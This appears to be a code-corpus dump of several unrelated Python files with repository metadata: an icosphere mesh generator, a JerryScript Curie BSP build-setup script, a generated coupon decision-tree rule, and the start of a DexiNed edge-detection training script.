raise Exception('level larger than ' + str(self.maxlevel) + ' not supported')
self.level = level
self.points = []
self.triangles = []
self.npts = 0
################################
# initialise level 1 icosahedron
################################
# golden ratio
t = (1.0 + np.sqrt(5.0)) / 2.0
# add vertices
self._addPoint(np.array([-1, t, 0]))
self._addPoint(np.array([ 1, t, 0]))
self._addPoint(np.array([-1,-t, 0]))
self._addPoint(np.array([ 1,-t, 0]))
self._addPoint(np.array([ 0,-1, t]))
self._addPoint(np.array([ 0, 1, t]))
self._addPoint(np.array([ 0,-1,-t]))
self._addPoint(np.array([ 0, 1,-t]))
self._addPoint(np.array([ t, 0,-1]))
self._addPoint(np.array([ t, 0, 1]))
self._addPoint(np.array([-t, 0,-1]))
self._addPoint(np.array([-t, 0, 1]))
# make triangles
tris = self.triangles
verts = self.points
# 5 faces around point 0
tris.append(Triangle([ verts[0],verts[11], verts[5]]))
tris.append(Triangle([ verts[0], verts[5], verts[1]]))
tris.append(Triangle([ verts[0], verts[1], verts[7]]))
tris.append(Triangle([ verts[0], verts[7],verts[10]]))
tris.append(Triangle([ verts[0],verts[10],verts[11]]))
# 5 adjacent faces
tris.append(Triangle([ verts[1], verts[5], verts[9]]))
tris.append(Triangle([ verts[5],verts[11], verts[4]]))
tris.append(Triangle([verts[11],verts[10], verts[2]]))
tris.append(Triangle([verts[10], verts[7], verts[6]]))
tris.append(Triangle([ verts[7], verts[1], verts[8]]))
# 5 faces around point 3
tris.append(Triangle([ verts[3], verts[9], verts[4]]))
tris.append(Triangle([ verts[3], verts[4], verts[2]]))
tris.append(Triangle([ verts[3], verts[2], verts[6]]))
tris.append(Triangle([ verts[3], verts[6], verts[8]]))
tris.append(Triangle([ verts[3], verts[8], verts[9]]))
# 5 adjacent faces
tris.append(Triangle([ verts[4], verts[9], verts[5]]))
tris.append(Triangle([ verts[2], verts[4],verts[11]]))
tris.append(Triangle([ verts[6], verts[2],verts[10]]))
tris.append(Triangle([ verts[8], verts[6], verts[7]]))
tris.append(Triangle([ verts[9], verts[8], verts[1]]))
########################################
# refine triangles to desired mesh level
########################################
for l in range(self.level):
midPointDict = {}
faces = []
for tri in self.triangles:
# replace triangle by 4 triangles
p = tri.pts
a = self._getMiddlePoint(p[0], p[1], midPointDict)
b = self._getMiddlePoint(p[1], p[2], midPointDict)
c = self._getMiddlePoint(p[2], p[0], midPointDict)
faces.append(Triangle([p[0], a, c]))
faces.append(Triangle([p[1], b, a]))
faces.append(Triangle([p[2], c, b]))
faces.append(Triangle([a, b, c]))
# once looped thru all triangles overwrite self.triangles
self.triangles = faces
self.nfaces = len(self.triangles)
# check that npts and nfaces are as expected
expected_npts = calculate_npts(self.level)
expected_nfaces = calculate_nfaces(self.level)
if self.npts != calculate_npts(self.level):
raise Exception('npts '+str(self.npts)+' not as expected '+str(expected_npts))
elif self.nfaces != calculate_nfaces(self.level):
raise Exception('nfaces '+str(self.nfaces)+' not as expected '+str(expected_nfaces))
def _addPoint(self, xyz):
"""Add point to self.points"""
self.points.append(Point(self.npts, xyz))
self.npts += 1
def _getMiddlePoint(self, p1, p2, midPointDict):
"""return Point"""
if not isinstance(p1, Point) or not isinstance(p2, Point):
raise TypeError('p1 and p2 must be Points')
# does point already exist?
key = tuple(sorted([p1.idx, p2.idx]))
if key in midPointDict:
# point exists
pass
else:
# point is new
self._addPoint((p1.xyz + p2.xyz)/2)
midPointDict[key] = self.points[-1]
return midPointDict[key]
def plot3d(self):
"""Matplotlib 3D plot of mesh"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xyz = np.asarray([ pt.xyz for pt in self.points ])
x = xyz[:,0]
y = xyz[:,1]
z = xyz[:,2]
ts = np.asarray([ [ p.idx for p in t.pts ] for t in self.triangles ])
ax.plot_trisurf(x,y,ts,z)
plt.show()
def dump_xyz(self):
[ print(*pt.xyz) for pt in self.points ]
def dump_latlonr(self):
[ print(*cart2geo(*pt.xyz)) for pt in self.points ]
class Triangle:
"""A triangle adjoining three adjacent points"""
def __init__(self, pts):
if not isinstance(pts, list):
raise TypeError('pts must be a list')
elif len(pts) !=3:
raise Exception('pts must be of length 3')
else:
self.pts = pts
class Point:
"""A 3D point on the mesh"""
def __init__(self, idx, xyz):
if type(idx) is not int:
raise TypeError('idx must be an integer')
elif not isinstance(xyz,np.ndarray):
raise TypeError('xyz must be a numpy array')
elif xyz.size != 3:
raise Exception('xyz must be of size 3')
else:
# ensure length equals 1 and add to list of points
self.xyz = (xyz/np.linalg.norm(xyz))
self.idx = idx
def calculate_npts(level):
n = 2**level
return 2 + 10 * n**2
def calculate_nfaces(level):
n = 2**level
return 20 * n**2
def cart2geo(x, y, z):
"""convert x y z cartesian coordinates to latitude longitude radius
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
r = np.sqrt(x**2 + y**2 + z**2)
lon = np.rad2deg(np.arctan2(y,x))
lat = np.rad2deg(np.arcsin(z/r))
return lat, lon, r
def geo2cart(lat, lon, r):
"""convert latitude longitude radius to x y z cartesian coordinates
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
x = r * np.cos(lon) * np.cos(lat)
y = r * np.sin(lon) * np.cos(lat)
z = r * np.sin(lat)
return x, y, z
# def xyzToLatLonR(xyz):
# trans = np.array([np.])
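The consistency checks in the constructor above follow from the subdivision scheme: each refinement level quadruples the triangle count, so nfaces = 20 * 4**level, and since every edge is shared by two triangles (E = 3F/2), Euler's formula V - E + F = 2 gives npts = 2 + 10 * 4**level. A short standalone check of those counting formulas, independent of the class:

def calculate_npts(level):
    n = 2 ** level
    return 2 + 10 * n ** 2

def calculate_nfaces(level):
    n = 2 ** level
    return 20 * n ** 2

for level in range(9):              # maxlevel supported above is 8
    V = calculate_npts(level)
    F = calculate_nfaces(level)
    E = 3 * F // 2                   # 3 edges per triangle, each shared by 2 faces
    assert V - E + F == 2            # Euler characteristic of a sphere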
| 37.64486
| 96
| 0.544067
| 1,052
| 8,056
| 4.118821
| 0.19962
| 0.077544
| 0.083083
| 0.106162
| 0.36649
| 0.291715
| 0.17586
| 0.14355
| 0.14355
| 0.14355
| 0
| 0.032816
| 0.303997
| 8,056
| 214
| 97
| 37.64486
| 0.739968
| 0.1893
| 0
| 0.037313
| 0
| 0
| 0.042502
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.089552
| false
| 0.007463
| 0.029851
| 0
| 0.186567
| 0.022388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6109edbf02869c5f97fef83d0ae614ddf0da76
| 8,091
|
py
|
Python
|
targets/baremetal-sdk/curie-bsp/setup.py
|
ideas-detoxes/jerryscript
|
42523bd6e2b114755498c9f68fd78545f9b33476
|
[
"Apache-2.0"
] | 4,324
|
2016-11-25T11:25:27.000Z
|
2022-03-31T03:24:49.000Z
|
targets/baremetal-sdk/curie-bsp/setup.py
|
ideas-detoxes/jerryscript
|
42523bd6e2b114755498c9f68fd78545f9b33476
|
[
"Apache-2.0"
] | 2,099
|
2016-11-25T08:08:59.000Z
|
2022-03-12T07:41:20.000Z
|
targets/baremetal-sdk/curie-bsp/setup.py
|
lygstate/jerryscript
|
55acdf2048b390d0f56f12e64dbfb2559f0e70ad
|
[
"Apache-2.0"
] | 460
|
2016-11-25T07:16:10.000Z
|
2022-03-24T14:05:29.000Z
|
#!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fnmatch
import os
def build_soft_links(project_path, jerry_path):
""" Creates soft links into the @project_path. """
if not os.path.exists(project_path):
os.makedirs(project_path)
links = [
{ # arc
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'),
'link_name': 'arc'
},
{ # include
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'),
'link_name': 'include'
},
{ # quark
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'),
'link_name': 'quark'
},
{ # quark/jerryscript
'src': jerry_path,
'link_name': os.path.join('quark', 'jerryscript')
}
]
for link in links:
src = os.path.join(jerry_path, link['src'])
link_name = os.path.join(project_path, link['link_name'])
if not os.path.islink(link_name):
os.symlink(src, link_name)
print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name))
def find_sources(root_dir, sub_dir):
"""
Find .c and .S files inside the @root_dir/@sub_dir directory.
Note: the returned paths will be relative to the @root_dir directory.
"""
src_dir = os.path.join(root_dir, sub_dir)
matches = []
for root, dirnames, filenames in os.walk(src_dir):
for filename in fnmatch.filter(filenames, '*.[c|S]'):
file_path = os.path.join(root, filename)
relative_path = os.path.relpath(file_path, root_dir)
matches.append(relative_path)
return matches
def build_jerry_data(jerry_path):
"""
Build up a dictionary which contains the following items:
- sources: list of JerryScript sources which should be built.
- dirs: list of JerryScript dirs used.
- cflags: CFLAGS for the build.
"""
jerry_sources = []
jerry_dirs = set()
for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]:
for file in find_sources(os.path.normpath(jerry_path), sub_dir):
path = os.path.join('jerryscript', file)
jerry_sources.append(path)
jerry_dirs.add(os.path.split(path)[0])
jerry_cflags = [
'-DJERRY_GLOBAL_HEAP_SIZE=10',
'-DJERRY_NDEBUG',
'-DJERRY_DISABLE_HEAVY_DEBUG',
'-DJERRY_BUILTIN_NUMBER=0',
'-DJERRY_BUILTIN_STRING=0',
'-DJERRY_BUILTIN_BOOLEAN=0',
#'-DJERRY_BUILTIN_ERRORS=0',
'-DJERRY_BUILTIN_ARRAY=0',
'-DJERRY_BUILTIN_MATH=0',
'-DJERRY_BUILTIN_JSON=0',
'-DJERRY_BUILTIN_DATE=0',
'-DJERRY_BUILTIN_REGEXP=0',
'-DJERRY_BUILTIN_ANNEXB=0',
'-DJERRY_ESNEXT=0',
'-DJERRY_LCACHE=0',
'-DJERRY_PROPERTY_HASHMAP=0',
]
return {
'sources': jerry_sources,
'dirs': jerry_dirs,
'cflags': jerry_cflags,
}
def write_file(path, content):
""" Writes @content into the file at specified by the @path. """
norm_path = os.path.normpath(path)
with open(norm_path, "w+") as f:
f.write(content)
print("Wrote file '{0}'".format(norm_path))
def build_obj_y(source_list):
"""
Build obj-y additions from the @source_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list])
def build_cflags_y(cflags_list):
"""
Build cflags-y additions from the @cflags_list.
Note: each flag is emitted on its own cflags-y line.
"""
return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list])
def build_mkdir(dir_list):
""" Build mkdir calls for each dir in the @dir_list. """
return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list])
def create_root_kbuild(project_path):
""" Creates @project_path/Kbuild.mk file. """
root_kbuild_path = os.path.join(project_path, 'Kbuild.mk')
root_kbuild_content = '''
obj-$(CONFIG_QUARK_SE_ARC) += arc/
obj-$(CONFIG_QUARK_SE_QUARK) += quark/
'''
write_file(root_kbuild_path, root_kbuild_content)
def create_root_makefile(project_path):
""" Creates @project_path/Makefile file. """
root_makefile_path = os.path.join(project_path, 'Makefile')
root_makefile_content = '''
THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
T := $(abspath $(THIS_DIR)/../..)
PROJECT := {project_name}
BOARD := curie_101
ifeq ($(filter curie_101, $(BOARD)),)
$(error The curie jerry sample application can only run on the curie_101 Board)
endif
BUILDVARIANT ?= debug
quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig
arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig
# Optional: set the default version
VERSION_MAJOR := 1
VERSION_MINOR := 0
VERSION_PATCH := 0
include $(T)/build/project.mk
'''.format(project_name=project_name)
write_file(root_makefile_path, root_makefile_content)
def create_arc_kbuild(project_path):
""" Creates @project_path/arc/Kbuild.mk file. """
arc_path = os.path.join(project_path, 'arc')
arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk')
arc_sources = find_sources(arc_path, '.')
arc_kbuild_content = build_obj_y(arc_sources)
write_file(arc_kbuild_path, arc_kbuild_content)
def create_quark_kbuild(project_path, jerry_path):
""" Creates @project_path/quark/Kbuild.mk file. """
quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk')
# Extract a few JerryScript related data
jerry_data = build_jerry_data(jerry_path)
jerry_objects = build_obj_y(jerry_data['sources'])
jerry_defines = jerry_data['cflags']
jerry_build_dirs = build_mkdir(jerry_data['dirs'])
quark_include_paths = [
'include',
'jerryscript',
os.path.join('jerryscript', 'jerry-math', 'include'),
os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')
] + list(jerry_data['dirs'])
quark_includes = [
'-Wno-error',
] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths]
quark_cflags = build_cflags_y(jerry_defines + quark_includes)
quark_kbuild_content = '''
{cflags}
obj-y += main.o
{objects}
build_dirs:
{dirs}
$(OUT_SRC): build_dirs
'''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs)
write_file(quark_kbuild_path, quark_kbuild_content)
def main(curie_path, project_name, jerry_path):
project_path = os.path.join(curie_path, 'wearable_device_sw', 'projects', project_name)
build_soft_links(project_path, jerry_path)
create_root_kbuild(project_path)
create_root_makefile(project_path)
create_arc_kbuild(project_path)
create_quark_kbuild(project_path, jerry_path)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print('Usage:')
print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0]))
sys.exit(1)
project_name = 'curie_bsp_jerry'
file_dir = os.path.dirname(os.path.abspath(__file__))
jerry_path = os.path.join(file_dir, "..", "..", "..")
curie_path = os.path.join(os.getcwd(), sys.argv[1])
main(curie_path, project_name, jerry_path)
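The Kbuild fragments above are produced by simple string builders: build_obj_y emits one 'obj-y += <name>.o' line per source file and build_cflags_y does the same for compiler flags. A standalone sketch of what those helpers produce for a toy input (the paths and flags below are only examples):

import os

def build_obj_y(source_list):
    return '\n'.join('obj-y += {0}.o'.format(os.path.splitext(f)[0]) for f in source_list)

def build_cflags_y(cflags_list):
    return '\n'.join('cflags-y += {0}'.format(c) for c in cflags_list)

print(build_obj_y(['jerryscript/jerry-core/api/jerry.c', 'main.c']))
# obj-y += jerryscript/jerry-core/api/jerry.o
# obj-y += main.o
print(build_cflags_y(['-DJERRY_NDEBUG', '-Wno-error']))
# cflags-y += -DJERRY_NDEBUG
# cflags-y += -Wno-error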
| 32.107143
| 113
| 0.66024
| 1,100
| 8,091
| 4.607273
| 0.224545
| 0.036701
| 0.04341
| 0.027624
| 0.20955
| 0.143646
| 0.113852
| 0.060576
| 0.053275
| 0.053275
| 0
| 0.006365
| 0.20393
| 8,091
| 251
| 114
| 32.23506
| 0.780469
| 0.193548
| 0
| 0
| 0
| 0
| 0.274537
| 0.066635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077419
| false
| 0
| 0.019355
| 0
| 0.129032
| 0.025806
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe613281281e5fa651291114e4bc822aff3309a5
| 2,001
|
py
|
Python
|
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurant20to50, obj[15]: Direction_same, obj[16]: Distance
# {"feature": "Maritalstatus", "instances": 34, "metric_value": 0.99, "depth": 1}
if obj[7]>0:
# {"feature": "Age", "instances": 25, "metric_value": 0.9896, "depth": 2}
if obj[6]<=5:
# {"feature": "Time", "instances": 21, "metric_value": 0.9984, "depth": 3}
if obj[2]<=1:
# {"feature": "Occupation", "instances": 13, "metric_value": 0.8905, "depth": 4}
if obj[10]<=13:
# {"feature": "Coupon", "instances": 11, "metric_value": 0.684, "depth": 5}
if obj[3]>0:
# {"feature": "Distance", "instances": 10, "metric_value": 0.469, "depth": 6}
if obj[16]<=2:
return 'False'
elif obj[16]>2:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 7}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[10]>13:
return 'True'
else: return 'True'
elif obj[2]>1:
# {"feature": "Occupation", "instances": 8, "metric_value": 0.8113, "depth": 4}
if obj[10]<=7:
return 'True'
elif obj[10]>7:
# {"feature": "Weather", "instances": 3, "metric_value": 0.9183, "depth": 5}
if obj[1]<=0:
return 'False'
elif obj[1]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[6]>5:
return 'True'
else: return 'True'
elif obj[7]<=0:
# {"feature": "Age", "instances": 9, "metric_value": 0.5033, "depth": 2}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
else: return 'False'
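findDecision above encodes a single random-forest tree as nested threshold tests over a 17-element, label-encoded feature vector (the index-to-feature mapping is documented in the comment on its first line). A hedged usage sketch, assuming the function above is in scope; the feature values are made up purely for illustration:

# Hypothetical, already label-encoded feature vector following the obj[0]..obj[16] layout.
sample = [1, 1, 2, 1, 0, 0, 3, 1, 0, 2, 5, 4, 1, 2, 1, 0, 1]
print(findDecision(sample))   # prints the string 'True' or 'False'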
| 37.754717
| 347
| 0.571714
| 289
| 2,001
| 3.913495
| 0.211073
| 0.123784
| 0.095491
| 0.105217
| 0.392573
| 0.296198
| 0.20336
| 0.121132
| 0.070734
| 0
| 0
| 0.092534
| 0.216892
| 2,001
| 52
| 348
| 38.480769
| 0.629228
| 0.54023
| 0
| 0.5
| 0
| 0
| 0.10011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe61ee9fb03a144ec04e2fb8220326b27f35be96
| 18,786
|
py
|
Python
|
main.py
|
AdrienCourtois/DexiNed
|
1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1
|
[
"MIT"
] | null | null | null |
main.py
|
AdrienCourtois/DexiNed
|
1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1
|
[
"MIT"
] | null | null | null |
main.py
|
AdrienCourtois/DexiNed
|
1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import os
import time, platform
import cv2
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info
from losses import *
from model import DexiNed
# from model0C import DexiNed
from utils import (image_normalization, save_image_batch_to_disk,
visualize_result)
IS_LINUX = True if platform.system()=="Linux" else False
def train_one_epoch(epoch, dataloader, model, criterion, optimizer, device,
log_interval_vis, tb_writer, args=None):
imgs_res_folder = os.path.join(args.output_dir, 'current_res')
os.makedirs(imgs_res_folder,exist_ok=True)
# Put model in training mode
model.train()
# l_weight = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 1.1] # for bdcn ori loss
# before [0.6,0.6,1.1,1.1,0.4,0.4,1.3] [0.4,0.4,1.1,1.1,0.6,0.6,1.3],[0.4,0.4,1.1,1.1,0.8,0.8,1.3]
l_weight = [0.7,0.7,1.1,1.1,0.3,0.3,1.3] # for bdcn loss theory 3 before the last 1.3 0.6-0..5
# l_weight = [[0.05, 2.], [0.05, 2.], [0.05, 2.],
# [0.1, 1.], [0.1, 1.], [0.1, 1.],
# [0.01, 4.]] # for cats loss
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device) # BxCxHxW
labels = sample_batched['labels'].to(device) # BxHxW
preds_list = model(images)
# loss = sum([criterion(preds, labels, l_w, device) for preds, l_w in zip(preds_list, l_weight)]) # cats_loss
loss = sum([criterion(preds, labels,l_w)/args.batch_size for preds, l_w in zip(preds_list,l_weight)]) # bdcn_loss
# loss = sum([criterion(preds, labels) for preds in preds_list]) #HED loss, rcf_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
if tb_writer is not None:
tb_writer.add_scalar('loss',
loss.detach(),
(len(dataloader) * epoch + batch_id))
if batch_id % 5 == 0:
print(time.ctime(), 'Epoch: {0} Sample {1}/{2} Loss: {3}'
.format(epoch, batch_id, len(dataloader), loss.item()))
if batch_id % log_interval_vis == 0:
res_data = []
img = images.cpu().numpy()
res_data.append(img[2])
ed_gt = labels.cpu().numpy()
res_data.append(ed_gt[2])
# tmp_pred = tmp_preds[2,...]
for i in range(len(preds_list)):
tmp = preds_list[i]
tmp = tmp[2]
# print(tmp.shape)
tmp = torch.sigmoid(tmp).unsqueeze(dim=0)
tmp = tmp.cpu().detach().numpy()
res_data.append(tmp)
vis_imgs = visualize_result(res_data, arg=args)
del tmp, res_data
vis_imgs = cv2.resize(vis_imgs,
(int(vis_imgs.shape[1]*0.8), int(vis_imgs.shape[0]*0.8)))
img_test = 'Epoch: {0} Sample {1}/{2} Loss: {3}' \
.format(epoch, batch_id, len(dataloader), loss.item())
BLACK = (0, 0, 255)
font = cv2.FONT_HERSHEY_SIMPLEX
font_size = 1.1
font_color = BLACK
font_thickness = 2
x, y = 30, 30
vis_imgs = cv2.putText(vis_imgs,
img_test,
(x, y),
font, font_size, font_color, font_thickness, cv2.LINE_AA)
cv2.imwrite(os.path.join(imgs_res_folder, 'results.png'), vis_imgs)
def validate_one_epoch(epoch, dataloader, model, device, output_dir, arg=None):
# XXX This is not really validation, but testing
# Put model in eval mode
model.eval()
with torch.no_grad():
for _, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
# labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
preds = model(images)
# print('pred shape', preds[0].shape)
save_image_batch_to_disk(preds[-1],
output_dir,
file_names,img_shape=image_shape,
arg=arg)
def test(checkpoint_path, dataloader, model, device, output_dir, args):
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint file not found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
# images = images[:, [2, 1, 0], :, :]
start_time = time.time()
preds = model(images)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk(preds,
output_dir,
file_names,
image_shape,
arg=args)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %.4f" % total_duration.mean(), "seconds")
print("Time spent in the Dataset: %.4f" % total_duration.sum(), "seconds")
def testPich(checkpoint_path, dataloader, model, device, output_dir, args):
# a test model plus the interchanged channels
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint file not found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
start_time = time.time()
# images2 = images[:, [1, 0, 2], :, :] #GBR
images2 = images[:, [2, 1, 0], :, :] # RGB
preds = model(images)
preds2 = model(images2)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk([preds,preds2],
output_dir,
file_names,
image_shape,
arg=args, is_inchannel=True)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %.4f" % total_duration.mean(), "seconds")
print("Time spent in the Dataset: %.4f" % total_duration.sum(), "seconds")
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description='DexiNed trainer.')
parser.add_argument('--choose_test_data',
type=int,
default=3,
help='Already set the dataset for testing choice: 0 - 8')
# ----------- test -------0--
TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8
test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX)
test_dir = test_inf['data_dir']
is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5
# Training settings
TRAIN_DATA = DATASET_NAMES[0] # BIPED=0
train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX)
train_dir = train_inf['data_dir']
# Data parameters
parser.add_argument('--input_dir',
type=str,
default=train_dir,
help='the path to the directory with the input data.')
parser.add_argument('--input_val_dir',
type=str,
default=test_inf['data_dir'],
help='the path to the directory with the input data for validation.')
parser.add_argument('--output_dir',
type=str,
default='checkpoints',
help='the path to output the results.')
parser.add_argument('--train_data',
type=str,
choices=DATASET_NAMES,
default=TRAIN_DATA,
help='Name of the dataset.')
parser.add_argument('--test_data',
type=str,
choices=DATASET_NAMES,
default=TEST_DATA,
help='Name of the dataset.')
parser.add_argument('--test_list',
type=str,
default=test_inf['test_list'],
help='Dataset sample indices list.')
parser.add_argument('--train_list',
type=str,
default=train_inf['train_list'],
help='Dataset sample indices list.')
parser.add_argument('--is_testing',type=bool,
default=is_testing,
help='Script in testing mode.')
parser.add_argument('--double_img',
type=bool,
default=True,
help='True: use same 2 imgs changing channels') # Just for test
parser.add_argument('--resume',
type=bool,
default=False,
help='use previous trained data') # Just for test
parser.add_argument('--checkpoint_data',
type=str,
default='14/14_model.pth',
help='Checkpoint path from which to restore model weights from.')
parser.add_argument('--test_img_width',
type=int,
default=test_inf['img_width'],
help='Image width for testing.')
parser.add_argument('--test_img_height',
type=int,
default=test_inf['img_height'],
help='Image height for testing.')
parser.add_argument('--res_dir',
type=str,
default='result',
help='Result directory')
parser.add_argument('--log_interval_vis',
type=int,
default=50,
help='The number of batches to wait before printing test predictions.')
parser.add_argument('--epochs',
type=int,
default=22,
metavar='N',
help='Number of training epochs (default: 25).')
parser.add_argument('--lr',
default=1e-4,
type=float,
help='Initial learning rate.')
parser.add_argument('--wd',
type=float,
default=1e-4,
metavar='WD',
help='weight decay (default: 1e-4)')
# parser.add_argument('--lr_stepsize',
# default=1e4,
# type=int,
# help='Learning rate step size.')
parser.add_argument('--batch_size',
type=int,
default=8,
metavar='B',
help='the mini-batch size (default: 8)')
parser.add_argument('--workers',
default=8,
type=int,
help='The number of workers for the dataloaders.')
parser.add_argument('--tensorboard',type=bool,
default=True,
help='Use Tensorboard for logging.'),
parser.add_argument('--img_width',
type=int,
default=480,
help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480
parser.add_argument('--img_height',
type=int,
default=480,
help='Image height for training.') # BIPED 400 BSDS 352
parser.add_argument('--channel_swap',
default=[2, 1, 0],
type=int)
parser.add_argument('--crop_img',
default=True,
type=bool,
help='If true crop training images, else resize images to match image width and height.')
parser.add_argument('--mean_pixel_values',
default=[103.939,116.779,123.68, 137.86],
type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
args = parser.parse_args()
return args
def main(args):
"""Main function."""
print(f"Number of GPU's available: {torch.cuda.device_count()}")
print(f"Pytorch version: {torch.__version__}")
# Tensorboard summary writer
tb_writer = None
